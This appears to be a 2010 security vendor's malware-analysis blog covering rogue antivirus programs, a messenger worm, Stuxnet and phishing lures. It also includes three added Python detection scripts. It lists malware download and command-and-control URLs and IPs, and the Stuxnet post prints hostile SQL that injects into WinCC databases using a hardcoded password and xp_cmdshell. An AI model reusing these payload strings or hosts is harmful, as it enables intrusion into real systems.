Aug 29

Security Essentials. NOT !

Rogue security products are constantly submitted to us by our customers and researchers for analysis, and we are carrying on with our short reports on the interesting things we come across during those analyses. This week our research lab met a rogue product passing itself off as Microsoft’s security product, Microsoft Security Essentials. Let us see what we found.

Every rogue variant tries to do something different to fool end users or to make the job of virus researchers a bit harder. When we started analyzing this variant, we saw that while the rogue is active on a victim’s system, it monitors every process. The instant an application is executed, the rogue terminates the responsible process.

It then shows the following fake alert.

The rogue has a hard-coded list of executables which will be blocked.

With the alert prompt in his face, if the user clicks “Clean Computer” or “Apply actions”, the application says “Unable to remove the threat”.

Running out of options, the user moves on to “Scan Online”, where he is redirected to the address below

- http://abcd799d2aae82bad9effd7a716d2.co.cc/pipec/new.php?id=allinone

and is shown the following screen.

The images, including the antivirus logos, point to

- http://64.27.0.236/images/pb.gif
- http://64.27.0.236/images/pca.png
- http://64.27.0.236/images/pb.gif
- http://64.27.0.236/images/NOD32.gif
- http://64.27.0.236/images/IKARUS.gif
- http://64.27.0.236/images/VirusBuster.gif
- http://64.27.0.236/images/VirusBuster.gif

Of course, when the aforesaid IP is visited, we are presented with the website below.

The social engineering attempts by these malware authors are never-ending, but as always they have more than one loophole. If we take a close look at the alert window with multiple AV vendor recommendations, we see that all the “legitimate” vendors have a scan result of “nothing” and a disabled removal tool button. The ones with enabled links are Red Cross, Peak Protection, Pest Detector, Major Defense Kit and AntiSpySafeguard. Let’s look into some of these.

Red Cross

When a user clicks the removal tool enabled for Red Cross, the user is navigated to http://abcd799d2aae82bad9effd7a716d2.co.cc/pipec/setup_rca.exe and the rogue variant is downloaded.

During the installation process, the rogue connects to the address http://abcd799d2aae82bad9effd7a716d2.co.cc/inst.php?id=hiro01

The system restarts after the installation, and the user is presented with a desktop showing a screen like the one below, but with no start button, taskbar or desktop icons.

We found out the rogue had changed the shell from explorer.exe to the malware executable.
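A check for the shell replacement described above, as an added example that is not part of the original post. It assumes the standard Winlogon `Shell` registry value (the page does not say which hive this rogue wrote to) and parses the text printed by `reg query`; the sample outputs and the rogue path are constructed.

```python
import re

# Standard location of the logon shell setting (not quoted on the page).
# Collect the input on the host with:
#   reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell
#   reg query "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell
WINLOGON_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Values treated as the stock Windows shell; anything else is reported.
EXPECTED_SHELLS = {
    "explorer.exe",
    r"c:\windows\explorer.exe",
    r"%systemroot%\explorer.exe",
    r"%windir%\explorer.exe",
}

# One value line of `reg query` output: 4 spaces, name, 4 spaces, type, 4 spaces, data.
VALUE_LINE = re.compile(
    r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_[A-Z_]+)\s{4}(?P<data>.*)$"
)


def parse_reg_query(text):
    """Return {value_name_lowercase: data} for every value line in the output."""
    values = {}
    for line in text.splitlines():
        match = VALUE_LINE.match(line)
        if match:
            values[match["name"].lower()] = match["data"].strip()
    return values


def unexpected_shell_entries(text):
    """List every Shell entry that is not the stock explorer.exe.

    The value may hold several comma-separated programs, so an entry such as
    "explorer.exe, rogue.exe" is reported as well.
    """
    values = parse_reg_query(text)
    if "shell" not in values:
        return []  # value absent, nothing to report for this hive
    entries = [e.strip().strip('"') for e in values["shell"].split(",")]
    return [e for e in entries if e and e.lower() not in EXPECTED_SHELLS]


# Constructed sample outputs (not captured from a real infection).
CLEAN = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    Shell    REG_SZ    explorer.exe
"""

HIJACKED = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    Userinit    REG_SZ    C:\WINDOWS\system32\userinit.exe,
    Shell    REG_SZ    C:\Documents and Settings\user\Application Data\rogue_example.exe
"""

if __name__ == "__main__":
    for label, output in (("clean", CLEAN), ("hijacked", HIJACKED)):
        print(label, unexpected_shell_entries(output))
```
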

Fake Alerts do continue

We did further analysis on Peak Protection 2010, Pest Detector, Major Defense Kit and AntiSpySafeguard, which showed similar behaviors: the desktop background screen and fake warnings. Some screenshots of such behaviors are given below for further awareness.

Aug 20

Rogue Antivirus. Again?

We blogged about Antivirus2010 and tried to find out a little more than normal analysis would have. Our series exposing the latest rogue security product variants continues this week with another of its kind, Security Suite.

Back in 2008, with AntivirusXP and then a few others, a trend started among rogues: the main malicious binary is created as a randomly named executable inside a similarly randomly named folder. Security Suite carries on the trend, dropping the rogue application under %userprofile%\Local Settings\Application Data\%random%\%random%.exe.

Fake alerts have always accompanied rogue security products, and a few instances from this variant are below.

Digging deep into the rogue product, we see that, like most recent variants, this one is also packed and encrypted to protect itself from further analysis and to make the analysts’ job harder. The decryption routine for the same is shown below.

Security Suite marks its presence on the infected system with a unique mutex named “MSFT.Notepad”, another attempt to confuse end users. The malware also disables execution of most applications, barring a few with the following executable names.

  • Iexplore.exe
  • Opera.exe
  • Firefox.exe
  • Avsoft.exe
  • Avsuite.exe
  • Asdef.exe
  • Avsolution.exe
  • Ssuite.exe
  • Setup
  • Syssvc.exe
  • Getfile
  • Consent.exe
  • Dllhost.exe

We also saw remote connection attempts by the rogue product to the following malicious URLs
• hxxp://antivirone.com/percer.php?login=NjguOTQ3
• hxxp://antivirone.com/check?pgid=5

We did some domain-specific research and, of course, the domain was created as recently as

Name: Kese Done
Organization: Done inc
Address: Lee st 66
City: AL
Province/state: AL
Country: US
Postal Code: 36022
Phone: +1.9957737722
Fax: +1.9957737722
Email: admin@antivirstrong.com

Nameserver Information:
ns1.antivirone.com
ns2.antivirone.com

Create: 2010-08-11 17:05:19
Update: 2010-08-11
Expired: 2011-08-11

Nothing really stands out. We then visited the mentioned “websites”, antivirone.com and antivirstrong.com, which not surprisingly look completely alike. Malware authors are always trying to bring out new and different ways to fool end users, and when a user lands on such a site through an accidental redirection or popup, the “polished” look will surely confuse him. But that is why we constantly carry on our attempts to educate users and make them aware.

Let’s have a look at http://antivirone.com/aboutus. The first thing we notice is, “Founded in 2000, the company’s mission is to bring security, productivity and privacy to the Internet.” And then this, “Our products and services are used by millions of people, with registered customers in over 150 countries. Our products are actively used by individual users, small businesses, non-profit and community organizations, educational institutions, government agencies, right through to a number of the worlds leading Fortune 500 companies.” Interesting, but did we not just see that the domain itself was registered on 11th August 2010?

We carried on our reverse analysis simultaneously, and discovered that the malware will also try to open adult content related websites on the victim’s computer as time passes by:

• www.viagra.com
• www.porno.org
• www.porno.com
• www.adult.com

We are as always ahead of these rogue products, and Emsisoft AntiMalware detects this threat as Trojan.Win32.FakeSpypro!IK or Adware.Win32.SecuritySuite!A2.

Detailed Report – http://www.virustotal.com/file-scan/report.html?id=9ef86655b73e16648f9ac9d079ea0c76fce26ee34a0073ea4d3a38fdbb17d948-1282330189

Detailed Report : http://www.virustotal.com/file-scan/report.html?id=622ee856d56f127324d245b23f10b893e964c4e8e7175d61ebe9d5f742ed7a4b-1282330202

Aug 18

Emsisoft + SandBoxie

We are excited to announce an awesome opportunity to try out Emsisoft AntiMalware and Sandboxie together.

Sandboxie runs your programs in an isolated space which prevents them from making permanent changes to other programs and data in your computer.

Sandboxie is an awesome product and complements Emsisoft AntiMalware very well. We have negotiated a very special offer with the makers of Sandboxie and the details are as follows,

Sandboxie for US $10! Limited offer – only 100 units available!

Single PC - 1 Year: US $50.-

Aug 11

VB100 for Emsisoft!

Emsisoft Anti-Malware has remained steps ahead of malware authors, and we make sure we keep our customers confident and safe while using their systems. We are very proud to state that we have been awarded the prestigious VB100 award this month. For those who are not aware of it, from Virus Bulletin’s website, http://www.virusbtn.com/vb100/index

In order to display the VB100 logo, an anti-virus product must have demonstrated in our tests that:

The product must fulfil these criteria in its default state.

This award is proof of our continuous dedication to making Emsisoft Anti-Malware the best antimalware product out there. A huge thank you goes out especially to our users and customers for their continuing faith in us.

Aug 09

antivirus2010, userinit and then some more

There is a new rogue variant making the rounds, going by the name Antivirus2010. The malware copies itself to the System32 directory with a name similar to a commonly used Windows file present in the same directory.

To the naked eye there seem to be two userinit.exe files, though one has a unique icon and the other doesn’t. We traversed the System32 directory in a command prompt, and the non-English character in the malicious userinit.exe showed up quite easily.
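The same look-alike check can be automated over a directory listing. The following is an added example, not code from the original post: the confusables map, the protected-name list and the sample listing are constructed for illustration, and the page does not say which non-English character the rogue actually used.

```python
import unicodedata

# Non-exhaustive map of non-Latin letters that render like Latin ones
# (constructed for this example).
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u0455": "s", "\u0458": "j",  # Cyrillic
    "\u03bf": "o", "\u03b9": "i", "\u03bd": "v",                                # Greek
    "\u0578": "n", "\u057d": "u",                                                # Armenian
}

# System binaries worth protecting against impersonation (assumed list;
# only userinit.exe is named on the page).
PROTECTED = {"userinit.exe", "winlogon.exe", "svchost.exe",
             "services.exe", "explorer.exe"}


def skeleton(name):
    """Reduce a file name to the ASCII string it visually resembles."""
    out = []
    for ch in unicodedata.normalize("NFKD", name.casefold()):
        if unicodedata.combining(ch):
            continue  # drop accents so that e-acute compares as plain e
        out.append(CONFUSABLES.get(ch, ch))
    return "".join(out)


def find_lookalikes(names, protected=PROTECTED):
    """Return (name, impersonated_name, offending_characters) for every
    non-ASCII name whose skeleton collides with a protected name or with a
    pure-ASCII name in the same listing."""
    ascii_names = {n.casefold() for n in names if n.isascii()}
    ascii_names |= {p.casefold() for p in protected}
    hits = []
    for name in names:
        if name.isascii():
            continue
        skel = skeleton(name)
        if skel in ascii_names:
            odd = [f"U+{ord(c):04X} {unicodedata.name(c, 'UNKNOWN')}"
                   for c in name if not c.isascii()]
            hits.append((name, skel, odd))
    return hits


# Constructed listing: two impersonations and one harmless accented name.
SAMPLE_LISTING = [
    "userinit.exe",
    "user\u0456nit.exe",      # Cyrillic i in place of Latin i
    "svch\u043est.exe",       # Cyrillic o in place of Latin o
    "notepad.exe",
    "r\u00e9sum\u00e9.doc",   # accented, but imitates nothing
]

if __name__ == "__main__":
    for name, target, odd in find_lookalikes(SAMPLE_LISTING):
        print(f"{name!r} imitates {target!r}: {', '.join(odd)}")
```

On a live host the listing can come from `os.listdir(r"C:\Windows\System32")`, which returns names as Unicode strings.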

The malware registers itself as a service to start automatically with Windows.

On execution, the malware extracts and builds a PE file in memory with the name lz32.dll, and makes a remote connection to download another DLL component.

Remote address connections established are

  • 213.174.130.36:8082/ask?t=1&u=5&a=0&m=aa26135f&h=b4e6aeff&s=0&p=0
  • 213.174.130.39
  • 213.174.130.39:80/update.db
  • http://213.174.130.32/verify.js?key=
  • http://213.174.130.39/uninstall.js
  • https://secure.avsbilling.com/order/get.php?i=antvir&advert=
  • https://secure.avsbilling.com/order/activate.php?orderid=

The downloaded malicious DLL is dropped under the System32 directory. The DLL normally has a random eight-letter name, for example mswmqnei.dll or mspnxdcm.dll, and is encrypted. The DLL is loaded into memory to display the main UI of the rogue security product. The UI was created using HTML/JavaScript and, as we can see, the malware stores it in the resource area of the DLL.

Analysing the HTML files, in INSTALL.HTML we notice a URL which is currently inactive. Incidentally, the IP in the URL is the same one that the malware uses to download the malicious file.

The front end of the IP, if visited, presents a website with adult content.

Looking at the registry modifications, we found some more information about the rogue product and decided to do some more research.

A simple DNS information query on hxxp://www.webtopbilling.com revealed

Domain Name: WEBTOPBILLING.COM

Registrant:
N/A
Nick Besmark (avbill@ua.fm)
P.O. Box 2494
Victoria
Mahe,00000
SC
Tel. +7.9263901779

Creation Date: 04-May-2010
Expiration Date: 04-May-2011

Domain servers in listed order:
ns2.unitedplatform.com
ns1.unitedplatform.com

There is nothing specifically suspicious about a website registered by someone residing in Mahe, Seychelles, which currently gives a 403 Forbidden message. We then looked at unitedplatform.com, and the first thing we noticed is that we actually land at domaincontext.com, which is a domain registrar website.

But we didn’t want to leave unitedplatform.com yet, and we stumbled upon http://www.malwareurl.com/ns_listing.php?ns=ns2.unitedplatform.com. The malware domains listed there show more than one instance of malicious activity, and it may be coincidence again that all are recently created domains. There may be a distant connection we can assume, which proves again the inter-relationship between various rogue security products and exploits on the web. It is more than a billion dollar industry out there, but we are always more than a step ahead of them.

Aug 01

Fake Facebook worm spreading through Yahoo, IRC

Between email spam, Twitter and Facebook, let us not forget one of the most prevalent media through which malware can spread. Messengers have always been a popular medium for malware propagation, and we at Emsisoft Labs recently came across worm-like behavior attempting to spread through Yahoo! Messenger.

The initial picture is not too unfamiliar to someone using Messenger: a random message window pops up with “Is this you on pic? Hxxp://hyperlink”.

If the victim clicks the hyperlink, the default browser opens and a file download prompt appears. We found the following few common executable download links

  • PI6-JPG-www.facebook.com.exe
  • PIC007-JPG-www.facebook.com.exe
  • PIC67576-JPG-www.facebook.com.exe
  • PIC676-JPG-www.facebook.com.exe
  • PIC6781-JPG-www.facebook.com.exe
  • IMG0018.exe

Analysing further we see the parent urls as below

  • hxxp://75.102.36.231/*****45336-JPG-www.facebook.com.exe
  • hxxp://migre.me/*****?=www.facebook.com/photo.php?=
  • hxxp://66.49.214.28/~av***/IMG0018.exe
  • hxxp://66.49.214.28/~av***/PI6-JPG-www.facebook.com.exe
  • hxxp://66.49.214.28/~av***/PIC007-JPG-www.facebook.com.exe
  • hxxp://66.49.214.28/~av***/PIC67576-JPG-www.facebook.com.exe
  • hxxp://66.49.214.28/~av***/PIC676-JPG-www.facebook.com.exe
  • hxxp://66.49.214.28/~av***/PIC6781-JPG-www.facebook.com.exe

On execution, the malicious file opens the browser to http://browseusers.myspace.com/Browse/Browse.aspx as a disguise while it runs its own malicious activities in the background.

We did some initial research, and based on some loose strings from the worm we tried to find out the payload. The worm looks for the Yahoo! Messenger application by searching for the window class named “YahooBuddyMain”, and then emulates keyboard events to send fake messages to all Yahoo! Messenger contacts.

Incidentally, the worm also tries to spread itself through IRC; below is an IRC traffic log event.

The malware also monitors keystrokes using the GetKeyState and GetAsyncKeyState APIs, adding possible keylogger activity.

Jul 28

Windows 7 is not safe. yet.

There have been quite a few security incidents related to USB/flash drives and autorun behaviors. Since the usage and portability of such devices are advantageous to users, it was just a matter of time before they were exploited by malware authors.

A new, recently discovered threat is getting some attention, and we at Emsisoft wanted to make sure users are aware of it and know more than just what it is. The threat is detected by Emsisoft Anti-Malware as Stuxnet, and is detected as TmpHider by some other vendors.

The malware already has quite a few detections and, as reported by VirusBlokAda, its propagation makes it different from the already prevalent drive- and autorun-based variants. Stuxnet spreads through flash drives and does not require user interaction at all, unlike other malware which uses the autorun feature of the same drives. The malware uses created .LNK files to carry out its execution. Emsisoft Anti-Malware detects the exploit .LNK file as Exploit.LNK.CVE-2010-2568.

The following files have been seen to be present in an infected flash disk

  • ~WTR4132.tmp
  • ~WTR4141.tmp
  • Copy of Shortcut to .lnk
  • Copy of Copy of Shortcut to .lnk
  • Copy of Copy of Copy of Shortcut to .lnk
  • Copy of Copy of Copy of Copy of Shortcut to .lnk

Once the user opens the flash drive in Windows Explorer and Explorer displays the icon of the shortcut, the malware automatically runs the malicious files, namely the .TMP files. The subsequent events happen without any user interaction or intervention.

Let us dig deep into the malicious events and binaries. The ~wtr4141.tmp and ~wtr4132.tmp files are actually DLLs which get loaded into memory. The malware then extracts two .SYS files named mrxcls.sys and mrxnet.sys, which are kernel drivers responsible for hooking and hiding the related malicious files. Thus, soon after execution of the malware, the files are no longer visible to the naked eye. Also interestingly, if we check the properties of the .SYS files, they are “digitally signed” by “Realtek Semiconductor Corp.”.

The kernel drivers get installed without any notification from Windows, as Windows thinks the files are trusted based on their digital signatures. Verisign has by now revoked the said certificates and also taken the necessary steps to make sure the malware won’t be able to run smoothly with a fake certificate.

Microsoft has explained that they are still investigating and working on an update to address this vulnerability (CVE-2010-2568). The report does mention that even a completely patched Windows 7, 32-bit or 64-bit, is affected by this vulnerability. The following is the complete list of affected versions of Windows system.

Stuxnet goes on to inject malicious files into the processes services.exe and svchost.exe. On infected processes one can see the module named KERNEL32.DLL.ASLR.XXXXXX. The malware creates the following in an infected machine.

  • %windir%\system32\drivers\mrxcls.sys
  • %windir%\system32\drivers\mrxnet.sys
  • %windir%\inf\oem6C.PNF
  • %windir%\inf\oem7A.PNF
  • %windir%\inf\mdmcpq3.PNF
  • %windir%\inf\mdmeric3.PNF

Analysis done in our lab revealed lots of interesting strings

s7hkimdb.dll

S7EPATDX.CPL

ApiLog\Types

SOFTWARE\Microsoft\MSSQLServer

WinCCConnect

.\WinCC

sqloledb

GracS\cc_tlg7.sav

Step7\Example

use [%s]

declare @t varchar(4000), @e int, @f int if exists (select text from dbo.syscomments where(N'[dbo].[MCPVREADVARPERCON]')) select @t=rtrim(text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id = object_id(N'[dbo].[MCPVREADVARPERCON]') set @e=charindex(',openrowset',@t) if @e=0 set @t=right(@t,len(@t)-7) else begin set @f=charindex('sp_msforeachdb',@t) if @f=0 begin set @t=left(@t,@e-1) set @t=right(@t,len(@t)-7)  end else select * from fail_in_order_to_return_false end set @t='alter '+@t+',openrowset(''SQLOLEDB'',''Server=.\WinCC;uid=WinCCConnect;pwd=2WSXcder'',''select 0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set @z=''''use [?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=''''''''--CC-S''''''''+char(80);if left(db_name(),2)=''''''''CC'''''''' select @t=substring(text,charindex(@s,text)+8,charindex(''''''''--*'''''''',text)-charindex(@s,text)-8) from syscomments where text like (''''''''%''''''''+@s+''''''''%'''''''');if @t is not NULL exec(@t)'''';ex

declare @t varchar(4000), @e int, @f int if exists (select * from dbo.syscomments where(N'[dbo].[MCPVPROJECT2]')) select @t=rtrim(c.text) from dbo.syscomments c, dbo.sysobjects o     where o.id = c.id and c.id = object_id(N'[dbo].[MCPVPROJECT2]') order by c.number, c.colid  set @e=charindex('--CC-SP',@t)  if @e=0  begin set @f=charindex('where',@t) if @f<>0 set @t=left(@t,@f-1) set @t=right(@t,len(@t)-6)  end else  select * from fail_in_order_to_return_false  set @t='alter '+@t+' where ((SELECT top 1 1 FROM MCPVREADVARPERCON)=''1'') --CC-SP use master;declare @t varchar(999),@s varchar(999),@a int declare r cursor for select filename from master..sysdatabases where (name like ''CC%'') open r fetch next from r into @t while (@@fetch_status<>-1) begin set @t=left(@t,len(@t)-charindex(''\'',reverse(@t)))+''\GraCS\cc_tlg7.sav'';exec master..xp_fileexist @t,@a out;if @a=1 begin set @s = ''master..xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t = @t+''x'';dbcc addextendedproc(s

The mentioned strings are assumed to belong to SIMATIC WinCC and SIMATIC Siemens STEP 7, which are popular software used in industrial processes. The malware is supposedly aimed at attacking such systems. Another interesting fact is that the countries most widely affected by this malware are Iran, Indonesia and India.

Microsoft has released a workaround until a patch is released which can be found here http://support.microsoft.com/kb/2286198#FixItForMe. Do update your respective antivirus system and make sure to scan any external device before using it. We at Emsisoft are constantly working hard to remain ahead as we will always be.

Jul 21

That video post in Craigslist!

Craigslist is one of the most visited websites, and malware authors are always on the lookout for such vectors for their own interest. A message like the one below has been circulating on Craigslist

I just want to make sure i am going to buy the same which i am looking for.
I can’t afford another mistake as i did in the past.
Please check the video and confirm that it’s the same u have.

PLAY VIDEO

If it’s the same one I will be there today to buy it

Thanks

A few have already fallen for this, as one such case shows.

The video URL points to
• http://fav-vid.net/playvideo.php?video=jgahnYYNPe0
• http://watch-stuff.us/playvideo.php?video=jgahnYYNPe3

The contents, when analysed, expose the following, which redirects users to the hyperlink hxxp://favvids.net/playvideo.php?video=jgahnYYNPe0&feature=youtube_gdata&name=my_stuff

The website when visited plays an old trick. The video is shown as not loaded and an additional action has to be taken to see the video.

The confused end user goes on to install the malicious file thus falling into the malware author’s trap.

The following code executes the action when the user goes on to press “Play”:

The download request comes for the FLVDirect player and, if the user agrees, he is redirected to flvpro.com.

The privacy page clearly mentions the collected information such as IP address, computer settings etc. The other interesting information is the number of downloads for the specific file, which is more than 2 million, thus acting as a confidence booster. Let’s go a bit deeper and we see the following

The script makes the download count start from 2358754 and keep growing with every second, another trick to fool users. The scan report for the same is shown below.


We at Emsisoft make sure to remain a step ahead always, detecting the specific malware as Riskware.WebToolbar.Win32.ChameleonTom!IK.
Further analysis on the malware was done. When this adware is executed, the following installation screen appears.


The user goes on to “Accept and Install”, and the program goes on to change browser settings without the user’s knowledge; the default homepage changes to hxxp://flvdirect.iamwired.net

The following remote website connections were established during installation
• download.flvmeganetwork.biz/FLVPlayer_silent.exe
• submit.flvmeganetwork.biz/usr/getgeoipinfo.php?gup=XnqtpZBVQQk=&u={AB4BB94A-733E-4B06-96A9-91C327FB0976}
• flvmeganetwork.biz/smb/fknst.php?v=1&p=oQ9M8bwrbWN7oktDK0105%2BSIZy%2FRfnOOWdfskwm4fggJrfJePi8zqEP%2Beq7a0FziayoOdCG1c54%3D
• flvdirect.com


Once the user goes on to fill in the information as shown, popups start appearing.


When the browser is opened, the following homepage starts as default, with a new shortcut on the desktop.


When the application is run, the player opens as below.


The Register has also reported on this adware, which can also be installed through mishandling on Facebook. Make sure to keep Emsisoft AntiMalware updated and be safe.

Jul 08

IRS and AcroIEHelper!

We have been continuously stressing the importance of malicious attacks through social networks and social engineering methods. Social carriers like Facebook and Twitter and social engineering catalysts like Internet browsers are under constant threat, and malware authors are always trying to create different kinds of attacks through these vectors.

Recent spam distributions related to the Internal Revenue Service (IRS) are spreading through the following URLs:
hxxp://www.irs.gov.psxxx.ru/fraud_application/directory/statement.php
hxxp://www.irs.gov.pxxx.ru/fraud_application/directory/statement.php
hxxp://www.irs.gov.msxxx.ru/fraud_application/directory/statement.php
where the URL tries to confuse end users with irs.gov in the middle of the extended URL. Similar URLs like
hxxp://supertototorama.eu/resume.html
hxxp://www.hrmsconsulting.com/info.html
hxxp://caaz.org/irs_form_2009_i1040tt.html

also add fuel to the fire.
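The "irs.gov in the middle of the URL" trick can be caught by comparing where the brand sits in the hostname. The following is an added example, not code from the original post: the function names are hypothetical, the parent domain is taken naively as everything to the right of the brand labels (no Public Suffix List), and the sample URLs are the masked ones listed above plus one constructed genuine address for contrast.

```python
import re
from urllib.parse import urlsplit


def refang(url):
    """Turn a defanged hxxp:// or hxxps:// URL back into a parseable one."""
    return re.sub(r"^hxxp", "http", url.strip(), flags=re.IGNORECASE)


def classify(url, brand="irs.gov"):
    """Return (verdict, domain) describing where the brand appears.

    genuine             host is the brand or a subdomain of it
    brand-in-subdomain  brand labels appear left of an unrelated parent domain
    brand-in-path       first brand label appears only as a token in the path
    unrelated           brand does not appear at all
    """
    parts = urlsplit(refang(url))
    host = (parts.hostname or "").rstrip(".").lower()
    brand = brand.lower()
    if host == brand or host.endswith("." + brand):
        return ("genuine", host)

    labels = host.split(".")
    brand_labels = brand.split(".")
    n = len(brand_labels)
    # Stop before the rightmost position: that one is the genuine case above.
    for i in range(len(labels) - n):
        if labels[i:i + n] == brand_labels:
            return ("brand-in-subdomain", ".".join(labels[i + n:]))

    tokens = re.split(r"[^a-z0-9]+", parts.path.lower())
    if brand_labels[0] in tokens:
        return ("brand-in-path", host)
    return ("unrelated", host)


def suspicious(urls, brand="irs.gov"):
    """Keep only the URLs that borrow the brand without belonging to it."""
    flagged = []
    for url in urls:
        verdict, domain = classify(url, brand)
        if verdict.startswith("brand-in-"):
            flagged.append((url, verdict, domain))
    return flagged


SAMPLE_URLS = [
    "hxxp://www.irs.gov.psxxx.ru/fraud_application/directory/statement.php",
    "hxxp://www.irs.gov.msxxx.ru/fraud_application/directory/statement.php",
    "hxxp://caaz.org/irs_form_2009_i1040tt.html",
    "hxxp://supertototorama.eu/resume.html",
    "https://www.irs.gov/",  # constructed genuine URL for contrast
]

if __name__ == "__main__":
    for url, verdict, domain in suspicious(SAMPLE_URLS):
        print(f"{verdict:20} real domain: {domain:12} {url}")
```
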

Tracing and analyzing one of these URLs (http://www.hrmsconxxxxxxx.com/info.html), we found out that there is an underlying exploit,

where “\x69\x6E\x66\x6F\x2E\x65\x78\x65” is a hexadecimal string decoding to “info.exe”; the said file is downloaded from the following hyperlink: hxxp://www.hrmsconxxxxxxx.com/info.exe.

Emsisoft Antimalware (EAM) detects the malware as Trojan-Downloader.Delphi!IK

Once executed, the malicious binary goes on to download a PDF from

http://static.googleusercontent.com/external_content/untrusted_dlcp/www.google.com/en//adwords/insider/Insiders_Guide_to_AdWords.pdf and attempts to download another file, hxxp://www.hrmsconsuxxxxx.com/ie.jpg, and drops itself as AcroIEHelper.dll under

C:\Windows\inf\AcroIEHelper.dll

which is approximately 658 KB and a Delphi binary.

Digging deeper, we found out that Info.exe registers AcroIEHelper.dll as a Browser Helper Object

- HKEY_LOCAL_MACHINE\software\Classes\CLSID\{FCADDC14-BD46-408A-9842-CDBE1C6D37EB}

- HKEY_LOCAL_MACHINE\software\Classes\CLSID\{FCADDC14-BD46-408A-9842-CDBE1C6D37EB}\InprocServer32
(SZ) (Default) = C:\WINDOWS\inf\AcroIEHelper.dll
(SZ) ThreadingModel = Apartment

- HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FCADDC14-BD46-408A-9842-CDBE1C6D37EB}

- HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FCADDC14-BD46-408A-9842-CDBE1C6D37EB}

- HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FCADDC14-BD46-408A-9842-CDBE1C6D37EB}\iexplore

With the execution of the malware, Internet Explorer is injected with the Browser Modifier.

Finally, the AcroIEHelper.dll file attempts to connect to http://91.216.xxx.xx/ebb.php, which we can see while analyzing the file.

The victim’s computer thus becomes an open book, ready to be exploited or waiting to be taken over for more malicious activities. We at Emsisoft are constantly working hard to make sure our customers are protected and remain safe, so please make sure you update your Windows version and always update Emsisoft Antimalware.

Jun 30

Browsers, and increasing threats.

How many times have you been infected while browsing, or, to ask a simpler question, how many times have you actually thought that your browser may be the root cause of many of the security problems you have on your system?

The malware authors are always on the look out to find the easiest way to get into your system, and with the increased importance of security in most platforms, browsers are one of the hottest targets. And there are plug-ins.

According to this report, http://www.theregister.co.uk/2010/03/09/adobe_reader_attacks/ , files based on Adobe Reader were exploited in almost 49 per cent of targeted attacks of 2009! And that’s just one of such scary news. Plug-ins like Flash or even Java, are under constant attack themselves and we see frequent updates of those.

Google announced some initiatives from their side about their own browser, Chrome and what they are doing to tackle such threats. More can be read here – http://blog.chromium.org/2010/06/improving-plug-in-security.html

The most important of all of these initiatives is the warning before running infrequently used plug-ins. That will keep most users on their toes about what they have been using and, if needed, they can uninstall or deactivate those they don’t use much. This helps in minimizing the number of problems right at the root, and users can always be sure of what they are using on their own system.